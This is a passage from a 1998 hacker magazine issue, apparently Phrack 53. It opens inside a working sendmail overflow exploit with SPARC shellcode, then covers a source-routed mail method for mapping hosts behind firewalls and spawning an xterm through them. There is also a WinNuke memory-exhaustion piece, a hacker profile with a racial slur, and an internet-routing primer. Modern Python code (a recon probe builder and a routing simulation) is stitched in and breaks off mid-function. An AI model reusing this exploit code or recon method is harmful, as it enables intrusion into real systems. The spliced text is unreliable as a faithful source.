    large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */

    for (i = prelude + 2; i < prelude + 64; i++)
        large_string[i] = 0xa61cc013;       /* Lots of sparc NOP's */

    /* Now the sparc execve /usr/etc/rpc.rexd code..
     */
    large_string[prelude + 64] = 0x250bcbc8;
    large_string[prelude + 65] = 0xa414af75;
    large_string[prelude + 66] = 0x271cdc88;
    large_string[prelude + 67] = 0xa614ef65;
    large_string[prelude + 68] = 0x291d18c8;
    large_string[prelude + 69] = 0xa8152f72;
    large_string[prelude + 70] = 0x2b1c18c8;
    large_string[prelude + 71] = 0xaa156e72;
    large_string[prelude + 72] = 0x2d195e19;
    large_string[prelude + 73] = 0x900b800e;
    large_string[prelude + 74] = 0x9203a014;
    large_string[prelude + 75] = 0x941ac00b;
    large_string[prelude + 76] = 0x9c03a104;
    large_string[prelude + 77] = 0xe43bbefc;
    large_string[prelude + 78] = 0xe83bbf04;
    large_string[prelude + 79] = 0xec23bf0c;
    large_string[prelude + 80] = 0xdc23bf10;
    large_string[prelude + 81] = 0xc023bf14;
    large_string[prelude + 82] = 0x8210203b;
    large_string[prelude + 83] = 0xaa103fff;
    large_string[prelude + 84] = 0x91d56001;
    large_string[prelude + 85] = 0xa61cc013;
    large_string[prelude + 86] = 0xa61cc013;
    large_string[prelude + 87] = 0xa61cc013;
    large_string[prelude + 88] = 0;         /* terminates the %s below */

    /* And finally, the overflow..simple, huh? :) */
    printf("helo\n");
    printf("mail from: %s%s\n", padding, (char *)large_string);
    return 0;
}
<-->

0x7>-------------------------------------------------------------------------

Practical Sendmail Routing

Intro:

This article will be short and sweet as the concept and methodology are quite simple. UUCP-style routing has been around longer than most newbie hackers, yet it is a foreign concept to them. In past years, Phrack has seen at least one article on using this method to route a piece of mail around the world and back to the base host. That article in Phrack 41 (Network Miscellany) by the Racketeer gave us a good outline of how to implement routed mail. I will recap that method and show a practical use for it. If you have any questions on the method for building the mail headers, read a book on UUCP or something.

How to:

In short, you want to create a custom route for a piece of email to follow.
This single piece of mail will follow your desired path and go through machines of your choice. Even with mail relaying turned off, MTAs that still honor source routes will pass this mail, because each one looks at the mail and delivers only one hop at a time. The customized headers basically tell sendmail that it should only be concerned about the next target in the path, and deliver. In our example below, we will have nine systems to be concerned about: your base host, seven systems to bounce through, and the user on the final destination machine.

    host1       = origin of mail; base host to send from.
    host2       = second...
    host3       = third... (etc)
    host4
    host5
    host6
    host7
    host8       = final hop in our chain (i.e.: second to last)
    user @ dest = final resting place for mail

Most people will wonder "why route mail, sendmail will deliver directly". Consider the first step in doing a penetration of a foreign network: recon. A would-be attacker needs as much information about a remote host as possible. Have you ever sent mail to a remote system with the intention of bouncing it? If not, try it. You will find it a quick and easy way of finding out what version of what MTA the host is running. Knowing that the message will bounce with that information, think larger. Send mail to multiple hosts on a subnet and it will return the version information for each machine it bounces through. Think larger. Firewalls are often set up to allow mail to go in and out without a problem. So route your mail past the firewall, bounce it among several internal systems, then route the mail right back out the front door. You are left with a single piece of mail containing information on each system it bounced through. Right off, you can start to assess whether the machines are running Unix or not, among other things.

So, with the example above, your mail 'to' will look like this:

    host3!host4!host5!host6!host7!host8!dest!user@host2

I know. Very weird as far as the order and placement of each. If you don't think it looks right, go reference it.
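The address layout above is easy to get backwards by hand, and the article's "one piece of mail per host" advice is a scripting job, so here is an added example (not code from the original article) that builds the bang-path addresses for both theoretical routes, wraps one probe per internal host, and pulls the "by host (version)" stamps that sendmail leaves in each Received: header out of a probe that has come back to you. Every host name, address and the sample returned message are constructed for illustration.

```python
"""Source-routed ("bang path") probe mail for the bounce recon above.

Added example, not code from the original Phrack article.  Host names,
addresses and the sample returned probe are constructed for illustration.

Address layout from the article:   host3!host4!...!host8!dest!user@host2
The first relay sits after the '@'; the remaining hops follow as a bang
path in delivery order, and the mailbox user is the last element.
"""
import email
import re
from email.message import EmailMessage


def bang_route(first_hop, later_hops, user):
    """Source-routed address: first_hop, then later_hops in order, then user."""
    return "!".join(list(later_hops) + [user]) + "@" + first_hop


def probe_route(firewall, internal_host, home_host, user):
    """Theoretical Route 1: you -> firewall -> internal host -> firewall -> you."""
    return bang_route(firewall, [internal_host, firewall, home_host], user)


def probe_route_nat(fw_ext, fw_int, internal_host, home_host, user):
    """Theoretical Route 2: name both firewall interfaces when the inside is NATed."""
    return bang_route(fw_ext, [fw_int, internal_host, fw_int, fw_ext, home_host], user)


def probe_routes(firewall, internal_hosts, home_host, user):
    """One address per internal host, so a probe that vanishes only costs that host."""
    return {h: probe_route(firewall, h, home_host, user) for h in internal_hosts}


def build_probe(sender, route):
    """Minimal message around a route; the body is irrelevant, the headers do the work."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = route
    msg["Subject"] = "routing probe"
    msg.set_content("probe\n")
    return msg


# sendmail stamps "by <host> (<version>/<config version>)" into every Received:
# header it adds; that is what the probe carries back when it reaches you.
BY_RE = re.compile(r"\bby\s+(\S+)\s+\(([^)]*)\)", re.S)


def mta_versions(raw_message):
    """[(host, software)] from the Received: headers of a returned probe,
    in header order (newest hop first)."""
    msg = email.message_from_string(raw_message)
    found = []
    for value in msg.get_all("Received", []):
        m = BY_RE.search(value)
        if m:
            found.append((m.group(1), m.group(2)))
    return found


# Constructed sample (not a real capture) of a probe that went out through a
# firewall, touched an internal host and came back along the same path.
SAMPLE_RETURN = """\
Received: from fw.example.net (fw.example.net [192.0.2.1])
    by attacker.example.org (8.8.8/8.8.8) with ESMTP id AAA001
    for <me@attacker.example.org>; Wed, 8 Jul 1998 00:00:03 -0400
Received: from db.internal.example (db.internal.example [10.1.2.3])
    by fw.example.net (8.8.5/8.8.5) with SMTP id AAA002; Wed, 8 Jul 1998 00:00:02 -0400
Received: from fw.example.net ([192.0.2.1])
    by db.internal.example (8.6.12/8.6.12) with SMTP id AAA003; Wed, 8 Jul 1998 00:00:01 -0400
From: me@attacker.example.org
To: db.internal.example!fw.example.net!attacker.example.org!me@fw.example.net
Subject: routing probe

probe
"""

if __name__ == "__main__":
    targets = ["db.internal.example", "www.internal.example"]
    for host, route in probe_routes("fw.example.net", targets,
                                    "attacker.example.org", "me").items():
        print(host, "->", build_probe("me@attacker.example.org", route)["To"])
    for host, software in mta_versions(SAMPLE_RETURN):
        print(f"{host}: sendmail {software}")
```

Two things to keep in mind when running this against anything real: the probe only comes back if every hop still processes source routes (RFC 1123 already allowed MTAs to ignore them, and most modern MTAs strip or refuse them), so a silent drop or a bounce from the first hop is the usual result today; and the Received: stamps are only as honest as the MTA that wrote them.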
Goal:

The desired outcome of this mail is to return with as much information about the remote network as possible. There are a few things to be wary of, however. If the mail hits a system that doesn't know how to handle it, you may never see it again. Routing the mail through a hundred hosts behind a firewall is risky in that it may take a while to go through, and if it encounters problems you may not get word back to know where it messed up. What I recommend is sending one piece of mail per host on the subnet. This can be scripted out fairly easily, so let this be a lesson in scripting as well.

Theoretical Route 1:

    you --> firewall --> internal host1 --> internal host2 --> firewall --> you

Theoretical Route 2:

If the internal network is on a different IP scheme than the external machines (i.e. address translation), then your mail will fail at the first hop by the above means. So, we can try an alternative of passing mail to both sides of the firewall in order. Of course, this would rely on knowledge of internal network numbering. If you are wondering how to get this, two ways come to mind. If you are one of those wacky 'white hat' ethical hackers, this information is often given during a controlled penetration. If you are a malicious 'black hat' evil hacker, then trashing or social engineering might be an option.

    you --> firewall (external interface) --> firewall (internal interface)
        --> internal host1 --> internal host2
        --> firewall (internal interface) --> firewall (external interface) --> you

Taking it to the next level:

So if you find this works, what else can you do? Have a remote sendmail attack lying around? Can you run a command on a remote machine? Know what an xterm is? Firewalls often allow a wide variety of traffic to go outbound. So route a remote sendmail-based attack to the internal host of your choice, spawn an xterm to your terminal and voila. You just bypassed a firewall!

Conclusion:

Yup. That is it. Short and sweet.
No need to put excess words in this article as you are probably late on your hourly check of rootshell.com looking for the latest scripts. Expand your minds.

Hi: mea_culpa
mea_culpa@sekurity.org

* "taking it to the next level" is a bastardized trademark of MC.
* 'wacky white hat ethical hacker' is probably a trademark of IBM.
* 'malicious black hat evil hacker' is a trademark of the ICSA.

0x8>-------------------------------------------------------------------------

Resource Hacking and Windows NT/95
by Lord Byron

With the release of Windows NT Service Pack 3 the infamous WinNuke denial of service attacks are rendered useless. At least that is what they would lead you to believe. This is not the case. To understand why, we need to delve into a little background on the internals of Windows; more specifically, the way that Windows allocates memory. This is the undying problem.

To better understand the problems with Windows memory allocation you have to go very deep within the operating system, to what is commonly called the "thunking layer". This layer is what allows Windows to call both 16- and 32-bit functions on the same function stack. If you make a TCP/IP-type function call or (if you are a database person) an ODBC function call, you are calling a pseudo 32-bit function. Yes, both of these direct drivers are 32-bit drivers, but they rely upon 16-bit code to finish their process. Once you enter one of these drivers all the data is passed into that driver. Windows also requires all drivers to run at level 0 (ring 0) within the Windows kernel. These drivers then pass off the data to different 16-bit functions. The difficulty of passing 32-bit data to a 16-bit function is where the thunking layer comes into the picture. The thunking layer is a wrapper around all 16-bit functions in Windows that can be called by a 32-bit function.
It thunks the data calls down to 16-bit by converting them into multiple data elements, normally done by a structure or by passing the actual memory dump of the variable into the function. Then the function does its processing on the data within the datagram and passes it back out of the function. At this point it goes back through the thunking layer, which reconverts the data back to a 32-bit variable, and then the 32-bit driver carries on with its processing. This thunking-layer scheme is not unheard of, nor has it never been used before, but given the way we all know Microsoft codes, it was done in a hurry, not properly implemented, and never tested until production. Due to the aforementioned reasons it should not surprise anyone that the code has severe memory leaks. This is why if you, for example, make ODBC calls to an Oracle database for long enough, your Windows box eventually becomes slower until it either crashes ("Blue Screen of Death") or just becomes unbearable to work with.

As Microsoft tries to patch these bugs in the device drivers it releases service packs such as SP3. The way that Microsoft has developed and implemented the device driver process is on a modular code basis. So when a patch is implemented it actually calls the modular code to handle the exact situation for that exploit.

Now that you know some of the basic internals as to how Windows makes its calls, it is time to understand resource hacking and the reason WinNuke still works. If you ping a Windows box it allocates a certain amount of RAM and runs code within the driver that returns the ICMP packet. Well, if you ping a Windows box 20,000 or 30,000 times, it has to allocate 20 or 30 thousand chunks of memory to run the device driver code that returns the ICMP packets.
Once there are 20 or 30 thousand little chunks of memory out there, you do not have enough memory left to allow the TCP/IP driver to spawn the code that handles normal functions within the Windows box. At this point, if you were to run WinNuke to send the OOB packet to port 139 on the Windows box, it would crash the box. The OOB code that was used to patch WinNuke in SP3 could not be spawned due to the lack of memory available, and so the driver falls back to the original code in TCP/IP.sys; the packet gets processed by the standard TCP/IP driver that originally shipped with Windows, without the fix. The only way for Microsoft to actually fix this problem would be to rewrite the TCP/IP driver with the correct code within it as the core driver (instead of writing patches to be spawned when the exception occurs). Doing this, though, would require of Microsoft a significant amount of coding skill and talent, which we know no self-respecting coder would ever provide to the big evil.

0x9>-------------------------------------------------------------------------

----[ PDM

Phrack Doughnut Movie (PDM) last issue was `Grosse Pointe Blank`.

PDM52 recipients:

    Jim Broome
    Jonathan Ham
    Jon "Boyracer" George
    James Hanson
    Jesse Paulsen
    jcoest

All the recipients have J* first names. Eerie. And what is actually involved in `boyracing`? Do they put little saddles on them?

PDM53 Challenge:

"...Remember, ya always gotta put one in the brain. The first one puts him down, the second one finishes him off. Then he's dead. Then we go home."

----[ EOF

----[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 04 of 15

-------------------------[ P H R A C K 5 3 P R O P H I L E

-----------------[ Personal

Handle: Glyph
Call him: Yesmar
Reach him: glyph@dreamspace.net
Past handles: The Raver (cDc), Necrovore (Bellcore), Violence (The VOID Hackers)
Handle origin: Egyptian mythology: glyph \'glif\ n [Gk glyphe^- carved work, fr. glyphein to carve -- more at CLEAVE] (ca.
1727) a symbol that conveys information nonverbally (e.g., hieroglyphics).
Date of birth: Late 60's
Age at current date: As old as the lunar landing
Height: 5'10" or so
Weight: Skinny (I hate fat people)
Eye color: Blue
Hair color: Brown
Computers: Started with a TeleVideo 920 dumb terminal and worked my way up to a small collection of SGI and NeXT boxes.
Sysop/Co-Sysop of: Nothing that you've ever heard of (limited lifespan hacker boards on Prime superminis and VAX mainframes located on the X.25 global data networks).
Admin of: Go look in the InterNIC databases yourself.
URLs: I am not going to support the World Wide Waste of time in my Pro-Phile.

I first started playing with computers when I was nine years old. I started by learning FORTRAN on a Prime supermini at the local university where my parents worked. Later I learned BASICA on the original IBM PC (what hulks those were). Then a shipment of Apple ][+'s arrived and I learned about the joys of warez. Ultima ][, Wizardry, and all the rest kept me busy for a couple of years. I never had my own computer, so I had to hike down to the university computer center to frotz around. Around 1984 I was loaned a TeleVideo 920 dumb terminal and a 300 baud USR modem. I used it to connect to the university's PRIME cluster. A hacker was born. I had a legitimate account, but managed to obtain additional user IDs by exploring the filesystem. I had also begun tinkering around with the telephone network by this time.

Later I got an Apple //c and eventually a //gs. These computers got me back into the warez scene. One month I got a $500 phone bill. The next month the phone bill was back to $0. The only difference was that the warez intake had nearly doubled. Indeed, I had learned about codes. I spent a lot of time calling warez boards around the country. Ultimately I tired of the pirate scene, mainly because of all the inane bickering. I also stopped phreaking because I had gotten scared. I disappeared for a year or so.
Eventually I made a comeback. I wanted to continue to play with computers and networks, but I wanted to avoid the phreaking scene. I decided that I needed a name. I decided to call myself 'The Raver' after Turiya Raver from _The Chronicles of Thomas Covenant the Unbeliever_. (Note: the rave scene was unknown in the U.S. at the time). I spent a lot of time calling hack/phreak boards and learning. I discovered that I really liked this new communications medium known as tfiles: files containing pure ASCII text. Tfiles could be about hacking, phreaking, anarchy, or best of all, DEAD COWS WHO RULE THE WORLD. Yes, I had discovered a rare beauty on the BBS landscape of the 80's: cDc -- the Cult of the Dead Cow. I was entranced. These people of the cow were like digital punks, espousing their wild views without a single care. I was instantly hooked. I started writing tfiles. Before long, I found myself invited to join the forces of the Cow. How could I decline Bob and Elsie? So it came to pass that I contributed to what I consider a class movement in the telecom scene of the late 80's. cDc fulfilled my need to communicate and hang with open-minded people in a BBS context. In time, my desire to hack started to come back. At first it was merely an 'itch' to poke at a system. Later it developed into a full-blown need to get into everything I could. It was around this time that I started exploring TELENET and the global X.25 data networks. I met ParMaster, the original members of Bellcore, and LOD/H on altger in Munich. I was hooked. Par and I, considering ourselves lame at the time, formed a group named XTension. The group flourished on the European networks. Eventually half of XTension were invited to join Bellcore. This was the first time any of us had experienced a rift in friendship over the digital medium. It was a painful learning experience. I would not talk to Par again for many years. In the meantime, I began working at learning even more under the wings of Bellcore. 
I hacked Primes for Bellcore. Under the tutelage of Chippy I discovered the ways of UNIX and TCP/IP networking. I changed my name to Necrovore in order to make clear the changes that had occurred. The name comes from the fact that I was very much into death metal at the time. Naming myself after the 'Eater of the Dead' seemed like a very reasonable thing to me at the time. (God, what was I thinking!?) At any rate, the Mentor of LOD and I used to pick fights with each other online across the world, so it isn't surprising that 'Necrovore' found its way into a Steve Jackson Games GURPS Supers module as one of the super villains. Heh.

Eventually Bellcore fell apart, as did so many groups. It became 'cool' and then too many people were invited to join, and then the trust fell apart. If there is a lack of trust, how can work be accomplished? Bellcore was done. It depressed me a lot because LOD continued strong. Was what I had fought for worthless? I thought not. At that time I decided that the days of Big Groups were over. Now it was time for the Small Cell.

The VOID Hackers were created by myself and The Usurper, now Thrashing Rage, a fellow ex-Bellcore member. We recruited Dr. Psychotic, a class assembly language hacker, and The Scythian, another hacker with a famous past, and started in after Primes and VAXen around the world. I wrote a lengthy series of articles on hacking Primes and submitted it to 2600. I got yelled at later by TK and KL for not submitting it to Phrack. To know the truth, I didn't think it was good enough for Phrack, which had been the soul of the scene since its inception. I never heard back from 2600. (Go figure.)

The VOID Hackers surpassed my wildest expectations. We hit systems across the planet. We had hundreds and hundreds of systems at our beck and call. It could only get better, or so I thought. Imagine my surprise then, one day, when my mom picked me up from school and told me that there were 'security people' at the house right then.
'FUCK,' I thought. Fuck, indeed. I was popped at age 20. I managed to avoid a multiple felony rap and retired right away. I used contacts to make it clear to government intelligence people and others that I was finished. I went to university and majored in English, then Anthropology, and ultimately settled on Computer Science. Instead of criminal hacking, I delved into hacking from the MIT perspective. I explored the UNIX system and sharpened my programming skills. Eventually I left the protected world of academia and made my way into the computer industry. With the heavy advent of the Internet I reappeared on the scene as glyph. It was interesting running into old friends (and enemies) and meeting new hackers on the scene. I went to several cons and continued to frolic in the security domain. By this time, however, I had pretty much ceased to engage in criminal hacking, spending my time instead developing security tools. Now I am completely retired. You may still see me as glyph from time to time, however. Undoubtedly, there are more of 'me' out there. grep. It's been a long, strange ride. I'd do it all over again if I wasn't so old. 8) ----------------[ Favorite things Women: Australian chicks rule. Cars: I don't drive. I might if I could recompile traffic algorithms, however this doesn't seem all that likely. I definitely would not drive a BMW. There are too many of those around as it is. I used to drive a skateboard. That was a long time ago, though. Brains and computers are still good to drive, however. Vrooom. Foods: Shrimp Vindaloo, please. Hot and spicy ethnic. Non-processed. Alcohol: Fine Italian Chianti. Vodka. Exotic imported beer. More Vodka. Music: Scorn, ClockDVA, My Life With the Thrill Kill Kult, Coil, Slint, Killing Joke, Chrome, Kraftwerk, Jane's Addiction, Zillatron, John Zorn, Praxis, Lard, Meat Beat Manifesto, Eat Static, Suede, Bill Laswell, Sepultura, Grotus, Mr. 
Bungle, Ozric Tentacles, Pink Floyd, Frontline Assembly, Dayglo Abortions, Dead Kennedys, Metallica, Slayer, Kreator, and lots and lots of other stuff.
Movies: The Stepford Wives, Invasion of the Body Snatchers, Brazil, Marathon Man, Blade Runner, anything by Akira Kurosawa, Memoirs of An Invisible Man, The Usual Suspects, Aeon Flux, Heavy Metal, Light Years.
Authors: Jorge Luis Borges, J. R. R. Tolkien, Kurt Vonnegut, Jr., Sun Tzu, Stephen R. Donaldson, H. P. Lovecraft, Gabriel Garcia Marquez, Clark Ashton Smith, Umberto Eco, George Orwell, Thomas Ligotti, Douglas Adams, Robert Anton Wilson.
Turn Ons: Intelligence, algorithms, open mindedness, guitars, see "Women".
Turn Offs: Arrogance, stupidity, shallowness, closed mindedness, media whoring.

----------------[ Passions

Music. Listening to it as well as making it.

Reading and writing.

Programming algorithms and data structures.

I have this rock that I found in the creek next to the elementary school I used to attend when I was in 3rd grade. The rock weighs over 7 pounds and is shaped like a pebble. I hefted it from the waters and proclaimed it as 'Herman', my pet rock. I've had it ever since I was 9 years old. That was the same year I first experienced computers. Holding on to this rock all these years has definitely been a passion of mine.

Slowly becoming a social recluse. I actually think this is healthy for me.

----------------[ Memorable experiences

Watching Wargames for the first time. Yes, I admit it. It affected my life.

Being lame and creating the group XTension with ParMaster. It was the first group for both of us. We thought it was pretty cool at the time.

Backdooring PRIMOS Rev. 22.0... yes, the actual source code repository. 8)

Trashing. Hiding in the dumpster while the janitor dumped trash on my head.

Hacking Europe, South America, and parts of Asia. Globe travelling...

Altger (NUA 026245890040004). Sigh. I liked it a lot better than irc.

SummerCon '95.
Other than knowing The Usurper and Hyperminde, and having Byteman visit from New Jersey for two weeks, I hadn't ever really met other real, live hackers before. Very cool.

chuck and edward. The l's. Bastards. 8)

Cytroxia on acid. Way to go, Danny.

The great 7-day Alliance Teleconference. I remember waking up to blasts of DTMF tones and raucous laughter.

TELENET. PAD to PAD. NUIs. TELENET THINGIES!!!1!! DNIC scanning.

That VAX cluster. Hey Par, remember *that* VAX cluster?

PROTEON.

XTension being rent asunder as half the members were invited into Bellcore and the other half being politely told to fuck off.

Novation AppleCat modems.

Watching a CERT advisory happen--from the inside. It was advisory CA-89.03. Hiya, Chippy! Where are you?

Social engineering for the first time. It worked, go figure.

The Richard Sandza teletrial.

Getting busted. I missed SummerCon '89 as a result. From Phrack #28 PWN: Violence and The Scythian: "We got busted by SoutherNet, but we'll be there!"

Backdooring a major network entity for the first time--the exhilaration.

PC PURSUIT. Oopsy.

Discovering I was published in 2600--almost 7 years after the fact! Hey, I got my free issues and t-shirts!

Fuck QSD channel.

Outdials.

The TCP/IP Drinking Game. Version 1.0.

SummerCon '96 in D.C. Talk about a quick buzz. NeTTwerk gave the speech. BioH, .mudge, ReDragon, myself, and a few others drank, and drank, and drank. A good time, to be sure. If anyone reading this has video footage of the event, please mail me.

Backdooring a major VAX application using a hex editor.

Jamming on Control-C and falling through the login command processor into old Primes. ROTFL.

Hacking from Dataphones in Boston.

My first buffer overflow. I remember talking on the phone with .mudge as I worked out the details.

Falling in love. Falling out of love.

----------------[ People to mention

In no particular order: Dr. Who, BioHazard, Alhambra, .mudge, Dr.
Cypher, Asriel, Bill From RNOC, _*Hobbit (still reading flammage after all these years), Swamp Rat, N8, The Dictator (AKA Dale Drew), Frankengibe, The Mentor, FryGuy, Garbage Heap, The Scythian, Mr. Xerox, MasterMicro, 0x486578, Tim N. (love your code), Bika (dig that hair), Grave45, Shewp, SkyHook, Blade Runner, Mycroft, Shatter, Sir Hackalot, Nirva, Crimson Death, Par, Taran King, Thingo It, Knight Lightning, Enkhyl, CheapShades, The Force, Byteman, The Leftist, Chippy (la la la), Mad Hacker (the *real* one), The Usurper/Thrashing Rage, Kewp (NOT!), Touch Tone (My voice isn't *that* hiiiigghhhh!!! CONNECT 1200), The Urvile/Necron 99, Hyperminde/Dr. Psychotic (Remember, until there is a cure for Assembly Language Brain Fry, there will always be the N.C. Home for Deranged Programmers), ReDragon, B, Route, GyroTech, Epsilon, Control-C (thanks for all the prank calls!). Lastly, I *must* mention that cool ass M.I. guy who tried to bust me--you were rad! (It was a truly good game. You told me to go to college, and I did. You also taught me not to under-estimate the enemy, because I did.) ----------------[ Boards to mention Elite Boards: Phoenix Project, Digital Logic, Pirate-80, Speed Demon Elite, the various Metalland systems, The Metal AE, Demon Roach Underground, upt.org, The Polka AE, The Lost City of Atlantis, Lunatic Labs, The Dead Zone, Ripco, Broadway Show/Radio Station, The Central Office, The Missing Link, Lutzifer, The Works, upt.org, and the L0phT BBS. There are undoubtedly more, but these are the ones I remember to this day. Local Boards: Never a fan of 'local' boards, there are only two that I can recall as being k-interesting to any degree: The Padded Cell and Pandemonium, both of which were in the 919 NPA. ----------------[ Quotes Gimme sum PR1MEZ!1!! May the Forces of Darkness become confused on the way to your house. 
WERE THE SEKRATARIES THAT R00L CYBERSPACE WE SKRIBBLE GFILES IN SHORTHAND HEY THE RAVER EYE HEAR U PACK A MEAN LUNCHBoX HEY ITS THE RAVER 0F CDC @#$@# HEY RAVER OF CDC @$@#$ RAVER COME OVER HERE AND POSE WITH ME AND GHEAP F0R A PH0T0 I CANT BELIEVE EYEM ON IRC WITH THERAVER OF CDC @$)%(&@*($&#* HEY LADYADA, IM ON IRC WITH THE RAVER OF CDC CAN YOU BELIEVE IT?! IM ST00PID NIGGAH oF M0D I don't think that was really SN, but it was funny as hell anyway. * glyph is away - vomiting binary - all Lame messages will be ignored. I actually vomit hex, but that always seems to break down into binary if it sits on the floor for a while When I was a kid, nobody ever picked me to play dodge ball, kick ball, or whatever. If I was picked, I was always last or second to last. You can imagine what a pleasure the following was to read: WE PICK GLYPH WE ALREADY HAVE GLYPH ASRIEL oh fuck well at least we have knuth Other quotes have been lost to the vestiges of time. ----------------[ The future of the computer underground I see a future without me. ----------------[ The forgotten pro-phile question ...And now for the [once] regularly taken poll from all interviewees. Of the general population of phreaks and hackers you have met, would you consider most, if any, to be computer geeks? No. Most phreaks and hackers that I have met are not geeks. They are more likely to be utter freaks, however, but not nerds or geeks. Geeks lack social skills. Phreaks and hackers have a definite social world that extends beyond phone switches and computer networks. Thanks for your time, Yesmar. "No problem." ----[ EOF ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 05 of 15 -------------------------[ Introduction and Overview of Internet Routing --------[ krnl ----[ Routing Overview: The process of routing can be quickly summarized as a node finding the path to every possible destination. Routing is present in everything from layer 1 (the physical layer) on up. 
The routing that most people are familiar with, however, occurs at layer 3 (the network layer) and as such, we will only reference layer 3 (and more specifically) Internet Protocol (IP) routing in this document. Protocols for exchange of routing information connect multiple routers around the world to provide them with a common view of the network through their heterogeneous, though generally consistent, routing tables. Routing tables store all information necessary for the router to reach every destination on the network irrespective of size (i.e. the network could be j.random LAN with one ip router and two hosts off of an ethernet port or it could be the Internet proper).

----[ Routing Protocols:

There are a wide variety of routing protocols used to contribute to the routing tables across a network. Protocols such as BGP, OSPF, RIP and ISIS help to convey a correct and coherent picture of the network to all network switches (routers).

----[ Routing Goals:

You can imagine that if each router has to store information that would allow it to reach every destination on the network, there is the possibility for it to amass a large routing table. Large routing tables are difficult (and sometimes impossible) for routers to process because of physical constraints (cpu, memory or a combination). Therefore, we would like to minimize the routing table space without sacrificing the ability to reach every destination on the network. For example, if the router is connected to the Internet via one DS1 link to another router, the router could store routing table information for each destination on the Internet or it could just default non-local information out that serial link. What defaulting means is that if the router does not have a specific entry in its table for the destination that the packet is trying to find, it sends it out the default link. The router towards which a router sends defaulted packets is sometimes called the 'gateway of last resort'.
This simple trick allows many routing tables to save a number of entries on the 30th order of magnitude.

Routing information should not be exchanged between routers in a spurious fashion. Frequent churn in the routing table puts unnecessary stress on the scarce memory and cpu of any given router. Information propagation should not interfere with the forwarding operations of the router. Though this means that you should not send routing updates every nanosecond, it does not mean that routing information should only be exchanged and updated weekly.

One of the important goals of routing is that it provide the host with a table which accurately reflects the current status of the network. The most important aspect of a router's operation is sending packets from input to the correct output. Misrouting packets could cause a loss of data. Routing table inconsistencies could also cause routing loops whereby a packet is passed between two adjacent interfaces ad infinitum.

It is desirable for routers to converge quickly. Convergence can be informally defined as a metric which gauges the speed at which routers arrive at a consistent view of the network. It would be ideal to have infinitesimal convergence times because that would ensure that each router on the network can accurately reflect the current topology even after a drastic change (link failure). When the network is changing, each router must propagate data which will aid other routers in converging to the correct picture of the network status. Problems with quick convergence are found in the routing updates. If a link is flapping (changing line status from up to down) rapidly, it can generate numerous installation and withdrawal requests. Therefore, that one link can end up consuming the resources of every router on the network because the other routers are forced to install and withdraw the route in rapid succession. While convergence is an important goal of routing protocols, it is not a panacea to network woes.
----[ Distance Vector Routing

Distance vector routing protocols distribute a list of tuples to all of the router's neighbors. These tuples assign a cost to reach every other node of the network. It is important to note that this routing information is only distributed to routers which are assigned as neighbors to the originating router. These neighbors are often physical, but can be logical in the case of eBGP multihop. That cost is the sum of the link costs for the router to reach a destination. Routers periodically send their neighbors distance vector updates; the neighbor then compares the received distance vector to its current distance vector. If a received cost is lower than its current cost for that destination, the router forwards traffic for that destination over the link it received the vector on.

The count to infinity problem is a problem with many distance vector implementations. We will assume that all links have a unit cost and that each hop corresponds to a unit. For example, if router X is connected to router Y and router Y is connected to router Z, we can demonstrate this problem (see fig 1). Y knows a 1 hop path to Z and X knows a 2 hop path to Z. Assume that link YZ goes down and the cost of that route is increased to infinity (fig 2). Now, Y knows an infinite cost route to Z because it knows the link is down, so it propagates this distance vector to X. Suppose X has sent an update to Y which advertises a 2 hop distance vector. Now, Y will think that it can get to Z through X, so it sends X an update that says it can get to Z in three hops (fig 3). Note that X has no idea that the distance vector being advertised to it was originated from X. This is a serious flaw in distance vectors. In their unmodified form, they do not contain the full path information that the route has traversed. As illustrated above, the router alternates between advertising a path to Z and advertising infinity to Z.
They keep this exchange up forever or until they have reached some internally defined infinity count (say 15 as in the case of RIP).

Count to Infinity problem:

    X--------------------Y--------------------Z
    Y:1                  X:1                  X:2
    Z:2                  Z:1                  Y:1

    [ fig 1 ] All links are up; below each node we note the destination and
              hopcount from each respective node.

    X--------------------Y--------*  *---------Z
    Y:1   <-------------   Z:infinity
    Z:2   ------------->   X:1

    [ fig 2 ] The link Y - Z breaks. Node X advertises Z:2 to node Y.

    X--------------------Y--------*  *---------Z
    Z:infinity (frm Y)  ->   X:1
    Y:1   <-------------     Z:3

    [ fig 3 ] Node Y sends its Z distance vector to X _before_ it receives
              node X's infinity. Once node Y receives node X's infinity, it
              sets its distance to infinity.

A path vector is an easy way to defeat the count-to-infinity problem. Basically, each distance vector also includes the router path that it traversed (fig 4). The router rejects an update from its neighbor if the path included in the update includes the router receiving the update (fig 5). The Border Gateway Protocol (which is used to exchange routing information between Autonomous Systems on the Internet) incorporates the path vector to stop the count-to-infinity problem. Obviously, you have to incorporate more information in the routing table if you want to include the AS path information that the route has traversed. The designers of BGP decided that it was optimal to sacrifice storage space and processing power for the robustness that the path vector affords the routing protocol.

Path Vector Solution:

    X--------------------Y--------------------Z
    Y:1 (Y)              X:1 (X)              X:2 (YX)
    Z:2 (YZ)             Z:1 (Z)              Y:1 (Y)

    [ fig 4 ] All links are up; below each node we note the destination,
              hopcount and path vector from each respective node.

    X--------------------Y--------*  *---------Z
    Y:1 (Y)              X:1 (X)
    Z:2 (Y Z)            Z:infinity

    [ fig 5 ] The link Y - Z breaks. Node Y knows to ignore X's advertisement
              of Z because Y is in the path vector.
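Simulating figs 1 through 5 in code, as an added example that is not part of the article: the tables of X, Y and Z with unit link costs, the Y-Z link failing, and the X-Y exchange run under three policies, plain distance vector (which counts up to a RIP-style infinity of 16), path vector (fig 5's rejection rule) and split horizon with poisoned reverse. The router names, the value of infinity and the simultaneous round-by-round exchange order are assumptions of the example.

```python
"""Constructed simulation of the X--Y--Z count-to-infinity scenario."""

INFINITY = 16  # assumption: RIP-style infinity

# Per router: destination -> (cost, next hop, path vector as a list of routers).
def initial_tables():
    """fig 1 / fig 4: all links up, every route known with its path."""
    return {
        "X": {"Y": (1, "Y", ["Y"]), "Z": (2, "Y", ["Y", "Z"])},
        "Y": {"X": (1, "X", ["X"]), "Z": (1, "Z", ["Z"])},
        "Z": {"X": (2, "Y", ["Y", "X"]), "Y": (1, "Y", ["Y"])},
    }

def advertise(tables, sender, receiver, mode):
    """Build the vector sender sends to receiver: dest -> (cost, path)."""
    vector = {}
    for dest, (cost, nhop, path) in tables[sender].items():
        if dest == receiver:
            continue
        if mode == "split_horizon" and nhop == receiver:
            # poisoned reverse: the next hop is told the route is unreachable
            vector[dest] = (INFINITY, [sender] + path)
        else:
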